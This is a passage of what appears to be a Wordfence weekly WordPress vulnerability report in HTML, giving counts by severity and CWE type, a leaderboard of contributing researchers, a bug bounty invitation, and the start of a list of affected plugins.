<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Medium Severity</td>
<td class="total text-center">48</td>
</tr>
<tr>
<td class="text-center">High Severity</td>
<td class="total text-center">21</td>
</tr>
<tr>
<td class="text-center">Critical Severity</td>
<td class="total text-center">6</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CWE Type Last Week</h3>
</p>
<table class="wfvr-list-table cwe-counts">
<tr>
<th class="text-center w-50">Vulnerability Type by CWE</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>Improper Neutralization of Input During Web Page Generation (&#8216;Cross-site Scripting&#8217;)</td>
<td class="total text-center">25</td>
</tr>
<tr>
<td>Improper Neutralization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)</td>
<td class="total text-center">14</td>
</tr>
<tr>
<td>Missing Authorization</td>
<td class="total text-center">13</td>
</tr>
<tr>
<td>Exposure of Sensitive Information to an Unauthorized Actor</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>Improper Privilege Management</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>Authorization Bypass Through User-Controlled Key</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>Cross-Site Request Forgery (CSRF)</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>Improper Limitation of a Pathname to a Restricted Directory (&#8216;Path Traversal&#8217;)</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>Always-Incorrect Control Flow Implementation</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Deserialization of Untrusted Data</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Input Validation</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Verification of Cryptographic Signature</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Incorrect Privilege Assignment</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Unrestricted Upload of File with Dangerous Type</td>
<td class="total text-center">1</td>
</tr>
</table>
<hr>
<h3><a></a>Researchers That Contributed to WordPress Security Last Week</h3>
</p>
<table class="wfvr-list-table researcher-list">
<tr>
<th class="text-center w-50">Researcher Name</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a>
				</div>
</p></div>
</td>
<td class="total text-center">25</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/68bf83ddc4a547f6935e2ad92922ee09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="68bf83ddc4a547f6935e2ad92922ee09"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener">Chu Thao Mai</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/72f3392477c128c582adb81190a31749.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="72f3392477c128c582adb81190a31749"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kacper-rybczynski" target="_blank" rel="noopener">Kacper Rybczyński</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/26a32c073d7e4edde36367c0e7b51808.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="26a32c073d7e4edde36367c0e7b51808"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/skyv3il" target="_blank" rel="noopener">skyv3il</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8d0b3f283d2748d1077325cb2522f7ff.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8d0b3f283d2748d1077325cb2522f7ff"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chirita-catalin-andrei-cc99ie" target="_blank" rel="noopener">Chirita Catalin-Andrei (CC99IE) (CC99IE)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/848ff46b2a1d687cc8e2670b302e1548.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="848ff46b2a1d687cc8e2670b302e1548"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/civitasmass" target="_blank" rel="noopener">Civitasmass</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/495f7dc5e65ef9d4606321be8446eb13.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="495f7dc5e65ef9d4606321be8446eb13"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lukasz-sobanski" target="_blank" rel="noopener">lucsob</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-kues" target="_blank" rel="noopener">Adam Kues</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/44769af46c8bd00c2681a3f31dbe1e45.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="44769af46c8bd00c2681a3f31dbe1e45"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ickogz" target="_blank" rel="noopener">ickogz</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4c713783cef57ea8eeef5b9a8f58c34b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c713783cef57ea8eeef5b9a8f58c34b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arya-prasetyo" target="_blank" rel="noopener">sorawautsukushiii</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5587b026daa672243d4903dbbc258039.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5587b026daa672243d4903dbbc258039"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/averon-averenkov-2" target="_blank" rel="noopener">Averon Averenkov</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7abadae46f0b063bdd43911a30a87f65.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7abadae46f0b063bdd43911a30a87f65"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/michael-mazzolini" target="_blank" rel="noopener">mikemyers</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f9f648dff2da40333953077293a47953.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f9f648dff2da40333953077293a47953"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/valentin-chamoret" target="_blank" rel="noopener">valent1</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cdd08c78865e3018da0048c2af00e893.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cdd08c78865e3018da0048c2af00e893"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/salih-utku-telis" target="_blank" rel="noopener">Salih Utku Telis</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/fd4ed1a2a7e43bffd9e64b482de48e9f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fd4ed1a2a7e43bffd9e64b482de48e9f"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/niyht" target="_blank" rel="noopener">Niyht</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8e4cd282e790f13211a36b16698009cb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e4cd282e790f13211a36b16698009cb"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener">Nguyen Dinh Hai (HaiND)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f53fb061b2b39c3b94e35c3f1ba9c31a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f53fb061b2b39c3b94e35c3f1ba9c31a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/le-bao" target="_blank" rel="noopener">Bao Le</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/94fc87dbe7283f8fbe6b648a50f6c19d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="94fc87dbe7283f8fbe6b648a50f6c19d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zpiotrak" target="_blank" rel="noopener">Zbigniew Piotrak</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1216c9552b2d98fdc5883f41c8074c3b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1216c9552b2d98fdc5883f41c8074c3b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daniel-wade-2" target="_blank" rel="noopener">Daniel Wade</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/33751fc657c409bebde901e7bad75981.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33751fc657c409bebde901e7bad75981"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-chu" target="_blank" rel="noopener">anhcd05</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/69f62ba6184391399971bbf0e46fbede.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69f62ba6184391399971bbf0e46fbede"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/eason" target="_blank" rel="noopener">Eason</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cb65b00ccbff9a148fd323568e0d76a7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cb65b00ccbff9a148fd323568e0d76a7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kw0" target="_blank" rel="noopener">Joshua Provoste</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c54963ce7f0451af98c05e1b494dc7ea.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c54963ce7f0451af98c05e1b494dc7ea"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/romain-deperne" target="_blank" rel="noopener">Romain Deperne (ang3L)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/686db6b846e085e9cdc3265bfe37f0ad.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="686db6b846e085e9cdc3265bfe37f0ad"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mfahad-khan" target="_blank" rel="noopener">M.Fahad Khan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/788ce00791f8b922ca94d1aa28ff9618.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="788ce00791f8b922ca94d1aa28ff9618"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuvraj-tomar" target="_blank" rel="noopener">Yuvraj Tomar</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/fe1c5e7ab8d1c6848c14c7ce93fe2256.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fe1c5e7ab8d1c6848c14c7ce93fe2256"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/f0dh1l" target="_blank" rel="noopener">F0DH1L</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d1f39a6f73f4287f8e67a2fe1f852ba7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d1f39a6f73f4287f8e67a2fe1f852ba7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hhhai" target="_blank" rel="noopener">hhhai</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2400719fbf58ba13f3eda25084096ad3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2400719fbf58ba13f3eda25084096ad3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/swat-2" target="_blank" rel="noopener">swat</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8ec93bb7e5ec96ab4636699e413382c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8ec93bb7e5ec96ab4636699e413382c9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener">Tin Pham (TF1T)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4418c9327e7455cc20ecc3238895e0d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4418c9327e7455cc20ecc3238895e0d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trong-pham-dtro" target="_blank" rel="noopener">Trong Pham (dtro)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/haongo" target="_blank" rel="noopener">haongo</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8c642c2fccd8e6c253cccc0ac3a6c684.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8c642c2fccd8e6c253cccc0ac3a6c684"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/fedex" target="_blank" rel="noopener">FeDEX</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/691c3168925c59eae700032d1721a348.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="691c3168925c59eae700032d1721a348"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/amonra" target="_blank" rel="noopener">AmonRa</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cd6f772c2edc5370a6f2829036933466.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd6f772c2edc5370a6f2829036933466"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mrproperctf" target="_blank" rel="noopener">MrProperCTF</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ff9bc9fb7771e161e54335c6af4fa582.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ff9bc9fb7771e161e54335c6af4fa582"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yangsori" target="_blank" rel="noopener">yangsori</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4c2bd6964b38518385c4e8d1791fd762.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c2bd6964b38518385c4e8d1791fd762"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener">zaim</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2a1b4c1c638eb4f66b0677e71058a830.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2a1b4c1c638eb4f66b0677e71058a830"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener">0xd4rk5id3</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1ff6f83f830b125bfe22fa490eb2bfe7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1ff6f83f830b125bfe22fa490eb2bfe7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hieupenguinnn" target="_blank" rel="noopener">HieuPenguinnn</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2b7e2a8d4c137f1479be4362c52fd452.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2b7e2a8d4c137f1479be4362c52fd452"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener">dodoh4t</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4556263103f4d729acc9ea43c104c0d3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4556263103f4d729acc9ea43c104c0d3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongmin-lee" target="_blank" rel="noopener">이성민</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f8da36de0b16927a052e4eb0878abbfb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8da36de0b16927a052e4eb0878abbfb"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener">lhking</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/51ac16594069727fd09950dd36cda805.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="51ac16594069727fd09950dd36cda805"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/talal-nasraddeen" target="_blank" rel="noopener">Talal Nasraddeen</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
</table>
<p><em>Are you a security researcher who would like to be featured in our weekly vulnerability report?</em> You can responsibly disclose your WordPress vulnerability discoveries to us and earn a bounty on in-scope vulnerabilities <a href="https://www.wordfence.com/threat-intel/vulnerabilities/submit/" target="_blank" rel="noopener">through our Bug Bounty Program</a>. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/" target="_blank" rel="noopener">Wordfence Intelligence leaderboard</a> along with being mentioned in our weekly vulnerability report.</p>
<hr>
<h3>WordPress Plugins with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>Academy LMS</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/academy" target="_blank" rel="noopener">academy</a>
		</td>
</tr>
<tr>
<td>Advance Product Search- Voice &amp; Ajax Search for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/th-advance-product-search" target="_blank" rel="noopener">th-advance-product-search</a>
		</td>
</tr>
<tr>
<td>Aimogen Pro &#8211; All-in-One AI Content Writer, Editor, ChatBot &amp; Automation Toolkit</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/aimogen-pro-allinone-ai-content-writer-editor-chatbot-automation-toolkit" target="_blank" rel="noopener">aimogen-pro</a>
		</td>
</tr>
<tr>
<td>Autopay dla WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pay-wp" target="_blank" rel="noopener">pay-wp</a>
		</td>
</tr>
<tr>
<td>Avada (Fusion) Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-builder" target="_blank" rel="noopener">fusion-builder</a>
		</td>
</tr>
<tr>
<td>Booking for Appointments and Events Calendar – Amelia</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">ameliabooking</a>
		</td>
</tr>
<tr>
<td>Breakdance</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/breakdance" target="_blank" rel="noopener">breakdance</a>
		</td>
</tr>
<tr>
<td>Bricksforge</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bricksforge" target="_blank" rel="noopener">bricksforge</a>
		</td>
</tr>
<tr>
<td>Catch Themes Demo Import</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/catch-themes-demo-import" target="_blank" rel="noopener">catch-themes-demo-import</a>
		</td>
</tr>
<tr>
<td>ChatHelp – Click to Chat Button, WooCommerce Chat to Order &amp; Floating Chat Form</td>
<td>
